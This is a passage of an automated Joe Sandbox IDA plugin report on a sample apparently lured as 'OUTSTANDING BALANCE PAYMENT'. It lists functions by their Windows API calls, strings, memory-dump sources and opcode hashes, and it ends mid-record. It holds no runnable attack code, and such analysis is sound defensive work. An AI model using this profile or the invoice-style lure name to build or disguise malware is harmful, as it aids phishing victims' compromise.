                                                                  • Opcode ID: ae6d051cba21b8742b25c325a9c10e562878e1914e7501a01f3dd912f0e4d341
                                                                  • Instruction ID: 931454ffd813bae3780a24ca16bdf6b5c3410df4b0c4112610eaa62941082800
                                                                  • Opcode Fuzzy Hash: ae6d051cba21b8742b25c325a9c10e562878e1914e7501a01f3dd912f0e4d341
                                                                  • Instruction Fuzzy Hash: F5319E31151119ABDF125FA5DC49FEB3BADFF09360F110215FA19A60A0CB36E821DBA4
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 2620052-3771769585
                                                                  • Opcode ID: c638a2e8cc11c47c8aae4a2becf0a75a00ad2af2407427c4670a7ba22858edee
                                                                  • Instruction ID: cb584d287412fd03d34aa729bb3ce09fbefe7c65cbdb103c5738930a4d9620f7
                                                                  • Opcode Fuzzy Hash: c638a2e8cc11c47c8aae4a2becf0a75a00ad2af2407427c4670a7ba22858edee
                                                                  • Instruction Fuzzy Hash: 4D110672914219ABCB26AFB0AC4EFDA77ACEF45710F00016EF046A6081EF70DE958B50
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002A5047
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • __gmtime64_s.LIBCMT ref: 002A50E0
                                                                  • __gmtime64_s.LIBCMT ref: 002A5116
                                                                  • __gmtime64_s.LIBCMT ref: 002A5133
                                                                  • __allrem.LIBCMT ref: 002A5189
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002A51A5
                                                                  • __allrem.LIBCMT ref: 002A51BC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002A51DA
                                                                  • __allrem.LIBCMT ref: 002A51F1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002A520F
                                                                  • __invoke_watson.LIBCMT ref: 002A5280
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction ID: 8c26513df32e2acc4acfefb8e2937ecfc7ebb0ca7b4bac4b6898fc922f5fb7de
                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction Fuzzy Hash: C9711B72A10F27ABD7149E78CC41BAB73A8AF16364F144169F814D7681EF70DD608BD0
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C4DF8
                                                                  • GetMenuItemInfoW.USER32(00341708,000000FF,00000000,00000030), ref: 002C4E59
                                                                  • SetMenuItemInfoW.USER32(00341708,00000004,00000000,00000030), ref: 002C4E8F
                                                                  • Sleep.KERNEL32(000001F4), ref: 002C4EA1
                                                                  • GetMenuItemCount.USER32(?), ref: 002C4EE5
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 002C4F01
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 002C4F2B
                                                                  • GetMenuItemID.USER32(?,?), ref: 002C4F70
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002C4FB6
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C4FCA
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C4FEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 91987234e027701b67ec26c06ee72fff449019b26ffed133c9c2f53e98c235fd
                                                                  • Instruction ID: 08e88eaf44978b98a4feaac4940815c20cfe7c64b8cb00a245d11e448ac45f6e
                                                                  • Opcode Fuzzy Hash: 91987234e027701b67ec26c06ee72fff449019b26ffed133c9c2f53e98c235fd
                                                                  • Instruction Fuzzy Hash: FA61AE7192024AAFEB21EFA4CCA4FAF7BB8EB45304F14025DF801A7251D771AD60CB20
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002E9C98
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002E9C9B
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002E9CBF
                                                                  • _memset.LIBCMT ref: 002E9CD0
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002E9CE2
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002E9D5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: 991da65b7c9f50b199af2dcc0610345c1377ba5cc90407f81638eae0b99fe3f1
                                                                  • Instruction ID: f6fd47982117daeaac21b756175bab45c88c8d65ea470f2573b707842646cd4c
                                                                  • Opcode Fuzzy Hash: 991da65b7c9f50b199af2dcc0610345c1377ba5cc90407f81638eae0b99fe3f1
                                                                  • Instruction Fuzzy Hash: 69618AB5950248AFDB11DFA8CC81EEEB7B8EB09700F54019AFA04AB291C774AD91CF50
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002B94FE
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 002B9549
                                                                  • VariantInit.OLEAUT32(?), ref: 002B955B
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 002B957B
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 002B95BE
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 002B95D2
                                                                  • VariantClear.OLEAUT32(?), ref: 002B95E7
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 002B95F4
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002B95FD
                                                                  • VariantClear.OLEAUT32(?), ref: 002B960F
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002B961A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 8c5ed8e3744ffeb8d838a2833a0c500266abf44e4b8eb3ce62e4593da11081dc
                                                                  • Instruction ID: a0c2b02a9fbd31fe62d0585b27ca63d5dd57c6cd7347a1b09f8f573305fdbe98
                                                                  • Opcode Fuzzy Hash: 8c5ed8e3744ffeb8d838a2833a0c500266abf44e4b8eb3ce62e4593da11081dc
                                                                  • Instruction Fuzzy Hash: 7E415E35911219AFCB02EFE5D8849DEBBBDFF08354F108066E511A3261DB70EA95CFA1
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?3$|?3
                                                                  • API String ID: 2862541840-403901264
                                                                  • Opcode ID: 84dcf0ee49b7de9b8b228389fff23f4014a92e3e23e17f99d82b13c8b7c47024
                                                                  • Instruction ID: 984c105f4264fef6f25f75984dbdabf7e1830a1611f7e2c9df758e6b5f91450a
                                                                  • Opcode Fuzzy Hash: 84dcf0ee49b7de9b8b228389fff23f4014a92e3e23e17f99d82b13c8b7c47024
                                                                  • Instruction Fuzzy Hash: 1B917E71A20215EFDF26CFA5C854FAEBBB9AF45710F11815BE505AB280DB709D50CFA0
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CoInitialize.OLE32 ref: 002DADF6
                                                                  • CoUninitialize.OLE32 ref: 002DAE01
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,0030D8FC,?), ref: 002DAE61
                                                                  • IIDFromString.OLE32(?,?), ref: 002DAED4
                                                                  • VariantInit.OLEAUT32(?), ref: 002DAF6E
                                                                  • VariantClear.OLEAUT32(?), ref: 002DAFCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: c75b27c783d18281ae2fc3a96176ff87d98653b6a85c124c71ab2af9db77e6f2
                                                                  • Instruction ID: c5b9b18b188a3b7267733093c2b4d51dfc5a65db64a5e3f7127294f897678178
                                                                  • Opcode Fuzzy Hash: c75b27c783d18281ae2fc3a96176ff87d98653b6a85c124c71ab2af9db77e6f2
                                                                  • Instruction Fuzzy Hash: E261BC712283029FD711EF54C888F6AB7E8AF88714F14495AF9859B391C770ED58CB93
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 002D8168
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 002D81AD
                                                                  • gethostbyname.WSOCK32(?), ref: 002D81B9
                                                                  • IcmpCreateFile.IPHLPAPI ref: 002D81C7
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002D8237
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002D824D
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002D82C2
                                                                  • WSACleanup.WSOCK32 ref: 002D82C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: b9aee31a222ffa8d3a3eea363221423357e8d36f1b543480278c4e17f3cf3bc2
                                                                  • Instruction ID: 7c2fa512792fe1b74dbb0f0090a7aedbc73645527c1112ec90c5c250f4ce0acd
                                                                  • Opcode Fuzzy Hash: b9aee31a222ffa8d3a3eea363221423357e8d36f1b543480278c4e17f3cf3bc2
                                                                  • Instruction Fuzzy Hash: D251AF35624701AFDB11EF64CC49B2AB7E4AF48720F04896AFA59DB3A1DB70ED14CB41
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CE396
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002CE40C
                                                                  • GetLastError.KERNEL32 ref: 002CE416
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 002CE483
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: 1218b6ed571e3cdeef059db7b80cf9136c00175ad77a26fad436eee30f5867a1
                                                                  • Instruction ID: 56dbf92e00721a8bedb2b2f3bcb83328ffde9d03ddca837cb6dd0fb3ad710d25
                                                                  • Opcode Fuzzy Hash: 1218b6ed571e3cdeef059db7b80cf9136c00175ad77a26fad436eee30f5867a1
                                                                  • Instruction Fuzzy Hash: 8731A435A1020A9FDB19EFA8C889FBDB7B8EF04300F15811AE506E7291DB709A51CB51
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002BB98C
                                                                  • GetDlgCtrlID.USER32 ref: 002BB997
                                                                  • GetParent.USER32 ref: 002BB9B3
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 002BB9B6
                                                                  • GetDlgCtrlID.USER32(?), ref: 002BB9BF
                                                                  • GetParent.USER32(?), ref: 002BB9DB
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 002BB9DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: 4a0c91083a2cf35b824cb320db91f16bed146ad0eb5abb50ee1b66f4430a3f18
                                                                  • Instruction ID: f1eabf9a93685e1c4d2bf9029ba7f05090a8e288bb59df7f9c1b153853b31f22
                                                                  • Opcode Fuzzy Hash: 4a0c91083a2cf35b824cb320db91f16bed146ad0eb5abb50ee1b66f4430a3f18
                                                                  • Instruction Fuzzy Hash: E421A478911108AFDB06AFA4CC95EFEB7B9EF45340F500116F551932D1DBB55825DF20
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002BBA73
                                                                  • GetDlgCtrlID.USER32 ref: 002BBA7E
                                                                  • GetParent.USER32 ref: 002BBA9A
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 002BBA9D
                                                                  • GetDlgCtrlID.USER32(?), ref: 002BBAA6
                                                                  • GetParent.USER32(?), ref: 002BBAC2
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 002BBAC5
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: MessageSend$CtrlParent
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 1383977212-1403004172
                                                                  • Opcode ID: a2db48c78b5d99b45355a3aa15a87c2110491ddbfdc1ea685e02804be016457c
                                                                  • Instruction ID: 680791b7b74b405a04c730ba9d10db3ec3eb34e83629bfc1365fc48422ac29f1
                                                                  • Opcode Fuzzy Hash: a2db48c78b5d99b45355a3aa15a87c2110491ddbfdc1ea685e02804be016457c
                                                                  • Instruction Fuzzy Hash: EF21F2B4A11108BFDB02AFA4CC95EFEBBB8EF44300F500016F551A32D1DBB548299F20
                                                                  APIs
                                                                  • GetParent.USER32 ref: 002BBAE3
                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 002BBAF8
                                                                  • _wcscmp.LIBCMT ref: 002BBB0A
                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 002BBB85
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                  • API String ID: 1704125052-3381328864
                                                                  • Opcode ID: fb7d78df4d7212754536d46440714472d040b97550c24c4e6e16da3cbed8bb79
                                                                  • Instruction ID: 90f168cddedeeda29d5760a4406372979a7c5dd80532801907aac16256978db8
                                                                  • Opcode Fuzzy Hash: fb7d78df4d7212754536d46440714472d040b97550c24c4e6e16da3cbed8bb79
                                                                  • Instruction Fuzzy Hash: AB110676628307FFFA226A35DC56DE7379C9B117A8F200022FD04E54E5EFE2A8314914
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 002DB2D5
                                                                  • CoInitialize.OLE32(00000000), ref: 002DB302
                                                                  • CoUninitialize.OLE32 ref: 002DB30C
                                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 002DB40C
                                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 002DB539
                                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 002DB56D
                                                                  • CoGetObject.OLE32(?,00000000,0030D91C,?), ref: 002DB590
                                                                  • SetErrorMode.KERNEL32(00000000), ref: 002DB5A3
                                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002DB623
                                                                  • VariantClear.OLEAUT32(0030D91C), ref: 002DB633
                                                                  Similarity
                                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                  • String ID:
                                                                  • API String ID: 2395222682-0
                                                                  • Opcode ID: 60a571d09412ec2ec8d38a14a01f074fb0409a1b3bef8d64806777d2f15f82b1
                                                                  • Instruction ID: b26c0b458ef7eae2be80bb863ec7f86da6811de8e984832f3a820641788bee31
                                                                  • Opcode Fuzzy Hash: 60a571d09412ec2ec8d38a14a01f074fb0409a1b3bef8d64806777d2f15f82b1
                                                                  • Instruction Fuzzy Hash: 79C13375618301EFC701EF68C8A496AB7E9BF88308F00495EF58A9B351DB70ED15CB92
                                                                  APIs
                                                                  • __lock.LIBCMT ref: 002AACC1
                                                                    • Part of subcall function 002A7CF4: __mtinitlocknum.LIBCMT ref: 002A7D06
                                                                    • Part of subcall function 002A7CF4: EnterCriticalSection.KERNEL32(00000000,?,002A7ADD,0000000D), ref: 002A7D1F
                                                                  • __calloc_crt.LIBCMT ref: 002AACD2
                                                                    • Part of subcall function 002A6986: __calloc_impl.LIBCMT ref: 002A6995
                                                                    • Part of subcall function 002A6986: Sleep.KERNEL32(00000000,000003BC,0029F507,?,0000000E), ref: 002A69AC
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 002AACED
                                                                  • GetStartupInfoW.KERNEL32(?,00336E28,00000064,002A5E91,00336C70,00000014), ref: 002AAD46
                                                                  • __calloc_crt.LIBCMT ref: 002AAD91
                                                                  • GetFileType.KERNEL32(00000001), ref: 002AADD8
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 002AAE11
                                                                  Similarity
                                                                  • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1426640281-0
                                                                  • Opcode ID: ca49a4db84f991d9a9ab5f0cfaf3866f7b0738fdd100482320b35b12fad91649
                                                                  • Instruction ID: de0a186c63e7e27b1916ba296e1839de259ba328fd4e966c370742416a0962dc
                                                                  • Opcode Fuzzy Hash: ca49a4db84f991d9a9ab5f0cfaf3866f7b0738fdd100482320b35b12fad91649
                                                                  • Instruction Fuzzy Hash: 8981D2709257468FDB15CF68C9805ADBBF4AF0B320F24426EE4A6EB3D1DB359812CB51
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0029B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0029B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0029B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0029B4BD
                                                                  • GetClientRect.USER32(?), ref: 002FDD63
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 002FDD7A
                                                                  • GetWindowDC.USER32(?), ref: 002FDD86
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 002FDD95
                                                                  • ReleaseDC.USER32(?,00000000), ref: 002FDDA7
                                                                  • GetSysColor.USER32(00000005), ref: 002FDDC5
                                                                  Similarity
                                                                  • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 3430376129-0
                                                                  • Opcode ID: 43279b987ecc541b13d6c990c506f79a6815e9bf32906b6b3afea206dd115fca
                                                                  • Instruction ID: 5ee73fcbe4f83bbed9f69e7b950809a03f8fa6c4fb60b6affd519d805c10074f
                                                                  • Opcode Fuzzy Hash: 43279b987ecc541b13d6c990c506f79a6815e9bf32906b6b3afea206dd115fca
                                                                  • Instruction Fuzzy Hash: DC118131111205EFDB626FB4EC18BA97FA9EB05325F104622FA66950E1CB710951EF10
                                                                  APIs
                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002830DC
                                                                  • CoUninitialize.OLE32(?,00000000), ref: 00283181
                                                                  • UnregisterHotKey.USER32(?), ref: 002832A9
                                                                  • DestroyWindow.USER32(?), ref: 002F5079
                                                                  • FreeLibrary.KERNEL32(?), ref: 002F50F8
                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002F5125
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                  • String ID: close all
                                                                  • API String ID: 469580280-3243417748
                                                                  • Opcode ID: deb903fb434c57812cc4c28e36965494dabb37b3c36872dced5a8df066f528e9
                                                                  • Instruction ID: ee972747a0bf8b73c462299cef227bb505b1a9411d98ff4062662f27e27fe87c
                                                                  • Opcode Fuzzy Hash: deb903fb434c57812cc4c28e36965494dabb37b3c36872dced5a8df066f528e9
                                                                  • Instruction Fuzzy Hash: 9D912B382225168FC715FF24C895B69F3A4BF04B04F5541A9E50AA72A2DF30AE76CF50
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 0029CC15
                                                                    • Part of subcall function 0029CCCD: GetClientRect.USER32(?,?), ref: 0029CCF6
                                                                    • Part of subcall function 0029CCCD: GetWindowRect.USER32(?,?), ref: 0029CD37
                                                                    • Part of subcall function 0029CCCD: ScreenToClient.USER32(?,?), ref: 0029CD5F
                                                                  • GetDC.USER32 ref: 002FD137
                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 002FD14A
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 002FD158
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 002FD16D
                                                                  • ReleaseDC.USER32(?,00000000), ref: 002FD175
                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 002FD200
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                  • String ID: U
                                                                  • API String ID: 4009187628-3372436214
                                                                  • Opcode ID: 560e2284d79b0bdad43f17d62042ecbac91be23ee62b0611d2b45f9ed6715546
                                                                  • Instruction ID: 1f2f0add71170efecef34e3b2d111b6b0c58448aa57635d8b2bf3457106972c3
